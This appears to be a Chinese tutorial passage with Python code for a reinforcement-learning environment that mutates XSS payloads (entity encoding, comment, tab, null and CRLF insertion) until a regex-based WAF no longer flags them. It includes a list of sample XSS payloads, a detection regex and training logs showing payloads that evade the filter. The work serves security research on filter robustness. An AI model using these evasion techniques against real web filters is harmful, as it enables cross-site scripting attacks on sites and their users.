WAF 强化学习
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# 随机字符转10进制 比如: a转换成a; # 随机字符转10进制并假如大量0 比如: a转换成a; # 插入注释 比如: /*abcde*/ # 插入Tab # 插入回车 # 开头插入空格 比如: /**/ # 大小写混淆 # 插入 \00 也会被浏览器忽略 ACTION_TABLE = { #'charTo16': 'charTo16', #'charTo10': 'charTo10', #'charTo10Zero': 'charTo10Zero', 'addComment' : 'addComment' , 'addTab' : 'addTab' , 'addZero' : 'addZero' , 'addEnter' : 'addEnter' , } def charTo16( self , str ,seed = None ): #print("charTo16") matchObjs = re.findall(r '[a-qA-Q]' , str , re.M | re.I) if matchObjs: #print("search --> matchObj.group() : ", matchObjs) modify_char = random.choice(matchObjs) #字符转ascii值ord(modify_char #modify_char_10=ord(modify_char) modify_char_16 = "&#{};" . format ( hex ( ord (modify_char))) #print("modify_char %s to %s" % (modify_char,modify_char_10)) #替换 str = re.sub(modify_char, modify_char_16, str ,count = random.randint( 1 , 3 )) return str def charTo10( self , str ,seed = None ): #print("charTo10") matchObjs = re.findall(r '[a-qA-Q]' , str , re.M | re.I) if matchObjs: #print("search --> matchObj.group() : ", matchObjs) modify_char = random.choice(matchObjs) #字符转ascii值ord(modify_char #modify_char_10=ord(modify_char) modify_char_10 = "&#{};" . format ( ord (modify_char)) #print("modify_char %s to %s" % (modify_char,modify_char_10)) #替换 str = re.sub(modify_char, modify_char_10, str ) return str def charTo10Zero( self , str ,seed = None ): #print("charTo10") matchObjs = re.findall(r '[a-qA-Q]' , str , re.M | re.I) if matchObjs: #print("search --> matchObj.group() : ", matchObjs) modify_char = random.choice(matchObjs) #字符转ascii值ord(modify_char #modify_char_10=ord(modify_char) modify_char_10 = "�{};" . format ( ord (modify_char)) #print("modify_char %s to %s" % (modify_char,modify_char_10)) #替换 str = re.sub(modify_char, modify_char_10, str ) return str def addComment( self , str ,seed = None ): #print("charTo10") matchObjs = re.findall(r '[a-qA-Q]' , str , re.M | re.I) if matchObjs: #选择替换的字符 modify_char = random.choice(matchObjs) #生成替换的内容 #modify_char_comment="{}/*a{}*/".format(modify_char,modify_char) modify_char_comment = "{}/*8888*/" . format (modify_char) #替换 str = re.sub(modify_char, modify_char_comment, str ) return str def addTab( self , str ,seed = None ): #print("charTo10") matchObjs = re.findall(r '[a-qA-Q]' , str , re.M | re.I) if matchObjs: #选择替换的字符 modify_char = random.choice(matchObjs) #生成替换的内容 modify_char_tab = " {}" . format (modify_char) #替换 str = re.sub(modify_char, modify_char_tab, str ) return str def addZero( self , str ,seed = None ): #print("charTo10") matchObjs = re.findall(r '[a-qA-Q]' , str , re.M | re.I) if matchObjs: #选择替换的字符 modify_char = random.choice(matchObjs) #生成替换的内容 modify_char_zero = "\\00{}" . format (modify_char) #替换 str = re.sub(modify_char, modify_char_zero, str ) return str def addEnter( self , str ,seed = None ): #print("charTo10") matchObjs = re.findall(r '[a-qA-Q]' , str , re.M | re.I) if matchObjs: #选择替换的字符 modify_char = random.choice(matchObjs) #生成替换的内容 modify_char_enter = "\\r\\n{}" . format (modify_char) #替换 str = re.sub(modify_char, modify_char_enter, str ) return str def modify( self , str , _action, seed = 6 ): print ( "Do action :%s" % _action) action_func = Xss_Manipulator().__getattribute__(_action) return action_func( str ,seed) ACTION_LOOKUP = {i: act for i, act in enumerate (Xss_Manipulator.ACTION_TABLE.keys())} #<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> #a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); #"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> #<input onblur=write(XSS) autofocus><input autofocus> #<math><a xlink:href="//jsfiddle.net/t846h/">click #<h1><font color=blue>hellox worldss</h1> #LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> class Waf_Check( object ): def __init__( self ): self .name = "Waf_Check" self .regXSS = r '(prompt|alert|confirm|expression])' \ r '|(javascript|script|eval)' \ r '|(onload|onerror|onfocus|onclick|ontoggle|onmousemove|ondrag)' \ r '|(String.fromCharCode)' \ r '|(;base64,)' \ r '|(onblur=write)' \ r '|(xlink:href)' \ r '|(color=)' #self.regXSS = r'javascript' def check_xss( self , str ): isxss = False #忽略大小写 if re.search( self .regXSS, str ,re.IGNORECASE): isxss = True return isxss class Features( object ): def __init__( self ): self .dim = 0 self .name = "" self .dtype = np.float32 def byte_histogram( self , str ): #bytes=np.array(list(str)) bytes = [ ord (ch) for ch in list ( str )] #print(bytes) h = np.bincount(bytes, minlength = 256 ) return np.concatenate([ [h. sum ()], # total size of the byte stream h.astype( self .dtype).flatten() / h. sum (), # normalized the histogram ]) def extract( self , str ): featurevectors = [ [ self .byte_histogram( str )] ] return np.concatenate(featurevectors) class WafEnv_v0(gym.Env): metadata = { 'render.modes' : [ 'human' , 'rgb_array' ], } def __init__( self ): self .action_space = spaces.Discrete( len (ACTION_LOOKUP)) #xss样本特征集合 #self.samples=[] #当前处理的样本 self .current_sample = "" #self.current_state=0 self .features_extra = Features() self .waf_checker = Waf_Check() #根据动作修改当前样本免杀 self .xss_manipulatorer = Xss_Manipulator() self ._reset() def _seed( self , num): pass def _step( self , action): r = 0 is_gameover = False #print("current sample:%s" % self.current_sample) _action = ACTION_LOOKUP[action] #print("action is %s" % _action) self .current_sample = self .xss_manipulatorer.modify( self .current_sample,_action) #print("change current sample to %s" % self.current_sample) if not self .waf_checker.check_xss( self .current_sample): #给奖励 r = 10 is_gameover = True print ( "Good!!!!!!!avoid waf:%s" % self .current_sample) self .observation_space = self .features_extra.extract( self .current_sample) return self .observation_space, r,is_gameover,{} def _reset( self ): self .current_sample = random.choice(samples_train) print ( "reset current_sample=" + self .current_sample) self .observation_space = self .features_extra.extract( self .current_sample) return self .observation_space def render( self , mode = 'human' , close = False ): return |
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1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | reset current_sample = <img src = `xx:xx`onerror = alert( 1 )> Do action :addEnter Do action :addComment Good!!!!!!!avoid waf:<img src = `xx:xx` one / * 8888 * / rr or = ale / * 8888 * / rt( 1 )> 987 / 1000 : episode: 221 , duration: 0.016s , episode steps: 2 , steps per second: 122 , episode reward: 10.000 , mean reward: 5.000 [ 0.000 , 10.000 ], mean action: 1.500 [ 0.000 , 3.000 ], mean observation: 0.179 [ 0.000 , 53.000 ], loss: 1.608465 , mean_absolute_error: 3.369818 , mean_q: 7.756353 reset current_sample = <! - - <img src = "--><img src=x onerror=alert(123)//" > Do action :addEnter Do action :addEnter Do action :addEnter Do action :addZero Do action :addEnter Do action :addEnter Do action :addEnter Do action :addEnter Do action :addEnter Good!!!!!!!avoid waf:<! - - < |
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